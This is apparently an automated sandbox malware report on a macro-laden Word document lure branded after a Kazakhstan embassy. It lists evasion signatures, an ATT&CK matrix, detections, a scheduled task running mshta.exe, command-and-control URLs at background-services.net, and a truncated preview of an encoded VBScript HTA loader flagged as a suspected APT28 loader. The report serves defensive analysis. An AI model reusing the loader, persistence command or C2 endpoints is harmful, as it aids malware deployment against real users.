Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Document contains an embedded VBA macro which accesses itself as a binary file (likely for evasion)

Source: VBA code instrumentation

OLE, VBA macro: Module ThisDocument, Function rundoc, API Open("C:\Users\user\AppData\Local\Temp\40#U0433.doc.doc")

Name: rundoc

Source: 40#U0433.doc	Stream path 'VBA/ThisDocument' : found possibly 'ActiveDocument.Name' functions activedocument.name
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function documeNt_opEn, found possibly 'ActiveDocument.Name' functions activedocument.name	Name: documeNt_opEn
Source: ~WRD0002.tmp.2.dr	Stream path 'VBA/ThisDocument' : found possibly 'ActiveDocument.Name' functions activedocument.name
Source: ~WRD0000.tmp.2.dr	Stream path 'VBA/ThisDocument' : found possibly 'ActiveDocument.Name' functions activedocument.name

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	42 Scripting	Valid Accounts	Windows Management Instrumentation	42 Scripting	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	Data Obfuscation	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	4 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
40#U0433.doc	41%	Virustotal		Browse
40#U0433.doc	34%	ReversingLabs	Script-WScript.Trojan.MacrosBomber
40#U0433.doc	100%	Avira	VBA/AVI.Obfuscated.hgyul
40#U0433.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\~WRD0001.tmp	100%	Joe Sandbox ML
C:\Users\user\Desktop\~WRD0002.tmp	100%	Joe Sandbox ML
C:\Users\user\Desktop\~WRD0000.tmp	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://background-services.net/setup.php	0%	Avira URL Cloud	safe
http://background-services.net	0%	Avira URL Cloud	safe
http://background-services.netttings	0%	Avira URL Cloud	safe
http://background-services.net/setup.phpi	0%	Avira URL Cloud	safe
http://background-services.netE02	0%	Avira URL Cloud	safe
http://background-services.net/setup.phpg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	84.201.210.39	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://background-services.net/setup.php	mshta.exe, 0000000C.00000002.2751456542.0000029383565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2750608776.00000293818D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2752210907.0000029383A90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://background-services.net	mshta.exe, 0000000C.00000002.2751023520.0000029382EDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2752374027.00000293CBC08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2751456542.000002938348E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2751023520.0000029382ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2753550030.00000293CD600000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://background-services.netE02	mshta.exe, 0000000C.00000002.2751023520.0000029382ED0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://background-services.netttings	mshta.exe, 0000000C.00000002.2751193944.00000293832A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://background-services.net/setup.phpi	mshta.exe, 0000000C.00000002.2751456542.0000029383565000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://background-services.net/setup.phpg	mshta.exe, 0000000C.00000002.2751456542.0000029383565000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590275
Start date and time:	2025-01-13 21:34:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	40#U0433.doc renamed because original name is a hash value
Original Sample Name:	16-09-2024 .doc
Detection:	MAL
Classification:	mal92.expl.evad.winDOC@7/16@0/0
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.175.87.197, 20.190.159.0
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:38:17	Task Scheduler	Run new task: ServiceDispatch path: C:\Windows\System32\mshta.exe s>C:\Users\user\AppData\Local\Settings\locale

LLM Input / Output

Input	Output
URL: Screenshot id: 16 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Keep an eye on it", "prominent_button_name": "Got it", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Keep an eye on it", "prominent_button_name": "Got it", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": " !", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Keep an eye on it", "prominent_button_name": "Got it", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Keep an eye on it", "prominent_button_name": "Got it", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 13 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": " !", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": " !", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 14 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": " !", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 15 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": " ", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 16 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": " - , , , , .", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "brands": [ "Kazakhstan Republic", "Ambassade de la Republique du Kazakhstan au Royaume de Belgique" ] }

URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": " - , , , , .", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 13 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "brands": [ "Kazakhstan Republic", "Ambassade de la Republique du Kazakhstan au Royaume de Belgique" ] }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "brands": [ "Ambassade de la Rpublique du Kazakhstan au Royaume de Belgique" ] }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": [ "Ambassade de la Rpublique du Kazakhstan au Royaume de Belgique" ] }

URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "brands": [ "Kazakhstan Republic", "Ambassade de la Republique du Kazakhstan au Royaume de Belgique" ] }

URL: Screenshot id: 15 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 14 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": [ "Ambassade de la Rpublique du Kazakhstan au Royaume de Belgique" ] }

URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "brands": [ "Ambassade de la Rpublique du Kazakhstan au Royaume de Belgique" ] }

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	Rev5_ Joint Declaration C5 GER_track changes.doc	Get hash	malicious	Unknown	Browse	217.20.57.18
	3.19.1+SetupWIService.exe	Get hash	malicious	Unknown	Browse	217.20.57.35
	JUbmpeT.exe	Get hash	malicious	Vidar	Browse	217.20.57.18
	DOCS974i7C63.pdf	Get hash	malicious	HTMLPhisher	Browse	217.20.57.20
	DOCS974i7C63.pdf	Get hash	malicious	HTMLPhisher	Browse	217.20.57.18
	https://support.wt-nx.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	84.201.210.39
	https://support.rv-rw.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	217.20.57.19
	https://findmy.cl-ew.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	217.20.57.18
	https://www.support.av-ro.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	217.20.57.35
	https://informed.deliveryekg.top/us/	Get hash	malicious	HTMLPhisher	Browse	217.20.57.34

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	3402
Entropy (8bit):	5.599930323764607
Encrypted:	false
SSDEEP:	48:dwm4wQ97qgOtXFYQqHyyzpE3bM0B04SAmRE7SahsOpjRCZ7/M67Sg1I0qC:WwQ9E2QE43YINF3psOl8Z/5P1I0qC
MD5:	88F2752BD67FA632DF940B52E38254BD
SHA1:	5E671630EACC842379EF09DCF57571E4CEED9574
SHA-256:	3EB696345C147D924A0407E37143C44E8BE3563EFA23EEC914E6C9ACEE3F2BEB
SHA-512:	7DDEBC720824F03E7693EFF42E7D1FED5C2FF6DC28F9A39E87123A56474649C1E9FE07FF2FCC1CEC10614546BD2EFC3A725D3A086100B0D451F6D0078E344EF2
Malicious:	false
Yara Hits:	Rule: apt_susp_apt28_uac0063_hta_loader, Description: Detects some suspected APT28 HTA loader, Source: C:\Users\user\AppData\Local\Settings\locale, Author: Sekoia.io
Reputation:	low
Preview:	<HEAD><HTA:APPLICATION ID="setuptools" APPLICATIONNAME="setuptools" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no" BORDER="none" SINGLEINSTANCE="yes"></HEAD><span id=codeblock>load</span><script Language="VBScript.Encode" defer>..#@~^EwwAAA==6.P3MDKDP"+k;:.PH+XY@#@&Skx9GhcD+kr"+:W,!S!@#@&SkUNKARsW-n:WPR+Z!T~ +Z!T@#@&wEx1YbGx,Yn:a`4b@#@&r.~2MDWM~]+kEs+~1naD@#@&dGr:,lSr@#@&doGMPrP{~8PPKPd+xvt@#@&il~',l~',ZtMcJLCJ,'~HbNvtSkS+#@#@&irP{Pr~3PF@#@&i1n6D@#@&dO.:aP',l@#@&2.N~s!x^ObWx@#@&Y.6Y,x~Y.:a`EF3q;F.!zXA8c+oy F3T8cXvw{A&T8,ZFc8&OX&8&{A2+X+FF2qA8&F+qfcO!O&3FqAX zq 2q+Z!q+z!)G~; /Z,8 &lF~T%Z,qWGq32!WTclZ zq+FwFyF3cTXl&3Fl+AZGT$lAF3T;)~F&2Z2ZFA!lq,2ZXGyT+8vcZfGlAFzfXcG W9F9TWF$!RT&yA+X22F+XGFq!;Xz flsl!ZG8qfFAZ8FqflFlqA8ZFlTfcFG8GTXqOcX&~* +AX0W,.fO{FG+8FqZ%WGFA!GXG8T 8f)2,FWqcW v8X/&W!2c&1Xyc{Fy+FZvqXWvF{TG)~FcXy&2AF+Fz* y!Xc2bq.ZsF+X22!Ffq!+FlF{Tw!1FlGlb./F !3qGX OXO&/ZcZfZ ~qvFAZ8!TflcFFTZZf!yTfF8v;v9{X2cT

C:\Users\user\AppData\Local\Temp\3E571842.tmp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	modified
Size (bytes):	1148
Entropy (8bit):	2.716960418943582
Encrypted:	false
SSDEEP:	24:VIXRZatKr3RIotD0quyFkKdpeXKGnyEi+uYyPjXzVAmrqpWpUOrv:ViCK36otgquidpeXbniYyPjB9WYpP
MD5:	58ED5182076081B1EEE9E1E950C49713
SHA1:	06393735181E361FAD7CB5F2DBA4F4B7AA821B25
SHA-256:	3F65A4A66029DB62197907E7DDDDEE12442E6DAFDE3104D8FAD1CE00E289F7C6
SHA-512:	D569191F922B11F4007CEA157B9A0A16AA33307F92722BA9D331D391B235177B921447DB5064C2C29B67044D60D1E8E5492BE46895A39AE10BA8483276CF7928
Malicious:	false
Reputation:	low
Preview:	6.3.6.4.3.3.4.,.1.0.3.4.5.0.2.0.,.7.7.8.7.0.2.2.2.4.,.3.7.4.6.3.7.6.,.1.4.6.1.9.5.4.,.1.0.6.9.5.5.3.,.2.6.0.1.,.3.7.4.6.3.7.2.,.1.5.6.1.9.5.8.,.3.7.4.6.2.5.9.,.3.7.4.6.3.6.8.,.1.1.9.6.3.7.8.,.4.2.1.4.2.1.7.,.3.7.4.6.3.6.9.,.6.3.6.4.3.3.1.,.1.9.8.4.4.3.5.,.1.5.6.1.9.5.5.,.3.7.4.6.3.7.3.,.4.8.0.9.1.5.7.6.3.,.7.7.8.7.0.2.2.2.5.,.4.8.0.9.1.5.7.6.5.,.1.2.2.3.4.3.4.,.7.7.8.7.0.2.2.3.4.,.5.2.1.6.4.2.,.1.2.2.0.7.7.9.,.4.8.0.9.1.5.7.6.4.,.7.2.9.1.8.1.0.4.3.,.1.4.6.1.9.5.5.,.3.7.4.6.2.6.5.,.6.7.0.4.1.0.9.,.;.1.6.5.7.4.5.3.,.1.6.5.7.4.5.2.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.6.9.5.0.9.3.5.1.,.3.2.9.4.5.8.7.9.9.,.3.1.4.1.5.9.1.5.,.3.0.1.2.3.4.6.6.,.3.0.1.5.3.7.2.1.,.3.7.4.6.3.7.9.,.2.7.1.5.3.4.9.7.,.1.0.6.9.5.3.3.,.1.0.3.4.5.0.2.1.,.3.4.4.1.3.9.5.3.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.2.5.4.8.7.8.5.4.,.6.7.0.4.1.0.8.,.3.2.9.4.5.8.8.0.3.,.1.0.0.1.,.1.0.2.3.6.3.7.,.1.5.6.1.9.5.6.,.1.0.6.9.5.5.2.,.3.1.4.1.5.9.0.0.,.3.2.0.5.9.2.7.6.7.,.3.3.7.9.1.6.2.,.6.3.6.4.3.3.0.,.1.0.2.3.6.3.8.,.2.1.0.0.9.4.0.,.2.4.

C:\Users\user\AppData\Local\Temp\40#U0433.doc.doc (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	22275
Entropy (8bit):	7.594783952663905
Encrypted:	false
SSDEEP:	384:/i+n6XtwyM/zeqzzzNxt/ZtNNjx3KmEOTRwwLb5MB7ha/9Q4kvaQvGwKij:/B6d7Aze8lxllNjom5wwLtys92Hr
MD5:	214513CA29E10F2AFF14A45A5C72DCDF
SHA1:	72DDD82FD8F845FC3BB0EA27AD081C77EB4F0013
SHA-256:	BE17BE2BB898626B1F3DC3AE8BA4A038C98952FA81F9F6F936AB634CB9440F0D
SHA-512:	1D709638D689CF5FEA6BAEA831826A9B697BA0C27D8C18D852D0EB7DFC10FC6F2F125A4B2C7CE2B9012761F3CEF68BA5E8EB65260719AB4A668EDB76E765031B
Malicious:	true
Reputation:	low
Preview:	PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D\|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB.D.N..XBH.C.......L:Po0Cy...He...........h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R\|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

C:\Users\user\AppData\Local\Temp\45449F77.tmp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	812
Entropy (8bit):	2.7223597372446555
Encrypted:	false
SSDEEP:	24:BrIZatKVUr0quyFLdpeXKzzykyYyPjJxpe20:9fCUYqugdpeXRYyPjJxpe5
MD5:	D1683B0BC08CE8833B3C780FFF2785B5
SHA1:	14BE2D116989DA4A5790D24F4D87AE506EB1871D
SHA-256:	51B7B848296F273B969C4A94941DD9B52E774E016FA2120B7B081D29F7C83564
SHA-512:	0278BCE568B05EF5266FC880AC32925B0E4164C0C7B4029441D28C80B5C496052A40A0BB8905DC348B9B101E62C7BBFA13B22101CE54BC5199AA5A933F578F8D
Malicious:	false
Preview:	6.3.6.4.3.3.4.,.7.7.8.7.0.2.2.2.4.,.1.0.3.4.5.0.2.0.,.3.7.4.6.3.7.6.,.1.0.6.9.5.5.3.,.2.6.0.1.,.3.7.4.6.3.7.2.,.1.5.6.1.9.5.8.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.5.,.3.7.4.6.3.7.3.,.4.8.0.9.1.5.7.6.3.,.7.7.8.7.0.2.2.2.5.,.4.8.0.9.1.5.7.6.5.,.1.2.2.3.4.3.4.,.7.7.8.7.0.2.2.3.4.,.4.8.0.9.1.5.7.6.4.,.7.2.9.1.8.1.0.4.3.,.1.4.6.1.9.5.5.,.;.2.6.9.5.0.9.3.5.1.,.3.2.9.4.5.8.7.9.9.,.6.5.4.0.2.1.5.,.1.6.5.7.4.5.2.,.2.3.7.1.6.5.1.,.1.6.5.7.4.5.3.,.3.0.1.2.3.4.6.6.,.3.0.1.5.3.7.2.1.,.3.7.4.6.3.7.9.,.2.7.1.5.3.4.9.7.,.1.0.6.9.5.3.3.,.1.0.3.4.5.0.2.1.,.3.4.4.1.3.9.5.3.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.7.0.4.1.0.8.,.3.2.9.4.5.8.8.0.3.,.1.5.6.1.9.5.6.,.1.0.2.3.6.3.8.,.2.4.5.2.3.8.7.,.1.0.0.9.,.7.7.8.7.0.2.2.2.7.,.8.9.8.9.8.9.8.9.8.,.3.1.9.0.0.0.0.0.,.3.2.0.5.9.2.7.6.7.,.2.4.5.2.3.8.8.,.2.1.0.0.9.4.0.,.3.1.4.1.5.9.0.0.,.

C:\Users\user\AppData\Local\Temp\msoF338.tmp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	GIF image data, version 89a, 15 x 15
Category:	dropped
Size (bytes):	663
Entropy (8bit):	5.949125862393289
Encrypted:	false
SSDEEP:	12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
MD5:	ED3C1C40B68BA4F40DB15529D5443DEC
SHA1:	831AF99BB64A04617E0A42EA898756F9E0E0BCCA
SHA-256:	039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
SHA-512:	C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
Malicious:	false
Preview:	GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

C:\Users\user\AppData\Local\Temp\~$#U0433.doc.doc

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.8877867481926813
Encrypted:	false
SSDEEP:	3:ZaKlP5nKYF/iYF/3/llP//Zk6cuAl/Dxcn:Za+cYF/iYF/3/3//jJLn
MD5:	C3236856C9B7C29715F24E84CDCCDEBB
SHA1:	19966B729BE50C57E36BDF9D3A5C34AFF88AE6B5
SHA-256:	B9F150FF1CF521076CED40562809766A90EE2A39FCF199993013B6569AC1863B
SHA-512:	F7A555C6AD767876C031549C5171C561CF68496092993A4E1967B3B23D38C15560B765397BD01DD3DC703F1E3BD68CC70A72435D079EA00F0039D2EE4707A53F
Malicious:	false
Preview:	.user..................................................H.a.n.z.o.............`=.....`=......W.......................W......>LI..e.../E......Y..e..........6...

C:\Users\user\AppData\Local\Temp\~WRD0000.tmp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	22275
Entropy (8bit):	7.594783952663905
Encrypted:	false
SSDEEP:	384:/i+n6XtwyM/zeqzzzNxt/ZtNNjx3KmEOTRwwLb5MB7ha/9Q4kvaQvGwKij:/B6d7Aze8lxllNjom5wwLtys92Hr
MD5:	214513CA29E10F2AFF14A45A5C72DCDF
SHA1:	72DDD82FD8F845FC3BB0EA27AD081C77EB4F0013
SHA-256:	BE17BE2BB898626B1F3DC3AE8BA4A038C98952FA81F9F6F936AB634CB9440F0D
SHA-512:	1D709638D689CF5FEA6BAEA831826A9B697BA0C27D8C18D852D0EB7DFC10FC6F2F125A4B2C7CE2B9012761F3CEF68BA5E8EB65260719AB4A668EDB76E765031B
Malicious:	false
Preview:	PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D\|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB.D.N..XBH.C.......L:Po0Cy...He...........h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R\|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

C:\Users\user\AppData\Local\Temp\~WRD0001.tmp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	27363
Entropy (8bit):	7.6972650144562955
Encrypted:	false
SSDEEP:	768:/B6dYzINNxvAbmOgzmyxllNjio/+ZXd92f:QmzINbImOgzPBQo2x6f
MD5:	BE56663D63C490BE577D562D46DE9C77
SHA1:	2C9886D5E282DF065492204991CA15C53998862B
SHA-256:	1BA710DE9496FBEF5FC32AC6A510ACEC5272C35DBA15E7AC1517821F9A835015
SHA-512:	4427B5BA02CE68CD534F2F1F90BCB0E041EB55C2F8B0B7A0B53F20E6616B118A156B2537383CA94FE36DBE5A27B323F9BE2D723501097B504FC8EAC5E25C33AB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
